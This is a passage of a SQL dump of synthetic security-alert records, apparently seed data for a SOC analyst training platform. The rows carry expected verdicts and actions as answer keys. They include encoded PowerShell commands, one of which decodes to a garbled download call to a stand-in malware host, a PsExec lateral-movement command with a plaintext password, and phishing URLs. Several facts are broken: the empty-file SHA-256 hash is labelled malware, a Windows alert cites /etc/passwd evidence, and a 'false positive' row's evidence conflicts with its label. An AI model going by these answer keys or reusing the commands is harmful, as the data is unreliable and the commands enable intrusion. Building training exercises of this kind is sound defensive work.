2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1738, 'Potential Process Hollowing Detected in Legitimate Process', 'high', 'Sysmon', 'Process hollowing detected in a legitimate process, indicating possible covert malware activity.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"\",\"username\":\"tjohnson\",\"hostname\":\"workstation-10\",\"command_line\":\"svchost.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Process hollowing detected, svchost.exe used for malicious purposes\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware exploiting process hollowing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address suggests an internal compromise\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is used to inject malicious code into legitimate processes, often to avoid detection.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1739, 'False Positive PowerShell Execution', 'low', 'Carbon Black', 'A PowerShell script executed with encoded commands was flagged, but investigation revealed it was a legitimate administrative task.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.20\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"admin-workstation\",\"command_line\":\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Confirmed as a legitimate administrative task\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP, confirmed as administrative workstation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command was part of a routine system maintenance script executed by the IT department.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1740, 'Unusual PowerShell Script Execution', 'medium', 'CrowdStrike', 'A PowerShell script executed with encoded commands, but matches known IT maintenance patterns.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:40:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.30\",\"dst_ip\":\"\",\"username\":\"it_support\",\"hostname\":\"it-workstation\",\"command_line\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaQBuAHYAbwBrAGUAIABzAHkAcwB0AGUAbQAgAHUAcABkAGEAdABlACIA\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaQBuAHYAbwBrAGUAIABzAHkAcwB0AGUAbQAgAHUAcABkAGEAdABlACIA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Matches known IT maintenance scripts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to IT support workstation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was part of a scheduled IT maintenance task.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1741, 'Potential Malware Command Execution via PowerShell', 'high', 'SentinelOne', 'PowerShell executed a suspicious encoded command that may be indicative of malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:10:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.55\",\"dst_ip\":\"\",\"username\":\"dlee\",\"hostname\":\"workstation-55\",\"command_line\":\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command linked to known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potential victim of malware attack\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a suspicious encoded PowerShell script suggests malware involvement.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1742, 'APT41 Lateral Movement Detected via PSExec', 'critical', 'ThreatConnect', 'Suspicious PSExec execution detected from an internal IP, mimicking APT41 techniques. Internal lateral movement observed.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.23\",\"dst_ip\":\"192.168.100.45\",\"username\":\"domain\\\\admin_user\",\"hostname\":\"CORP-SERVER-01\",\"command_line\":\"psexec \\\\\\\\192.168.100.45 -u domain\\\\admin_user -p Password123 cmd.exe\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Target internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.100.45 -u domain\\\\admin_user -p Password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PSExec command indicative of lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec is commonly used for lateral movement by APT41, indicating a potential breach.\"}', 'Advanced', 'TI', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1743, 'Lazarus Group Phishing Attempt with Malicious URL', 'high', 'MISP', 'Phishing email from a known Lazarus Group domain containing a malicious URL targeting internal users.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.200.15\",\"email_sender\":\"alert@secure-mail.com\",\"username\":\"john.doe@company.com\",\"hostname\":\"MAIL-SERVER-01\",\"url\":\"http://malicious-site.com/login\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"alert@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain mimics legitimate services\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Email with malicious URL targeting users, typical tactic of Lazarus Group.\"}', 'Advanced', 'TI', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 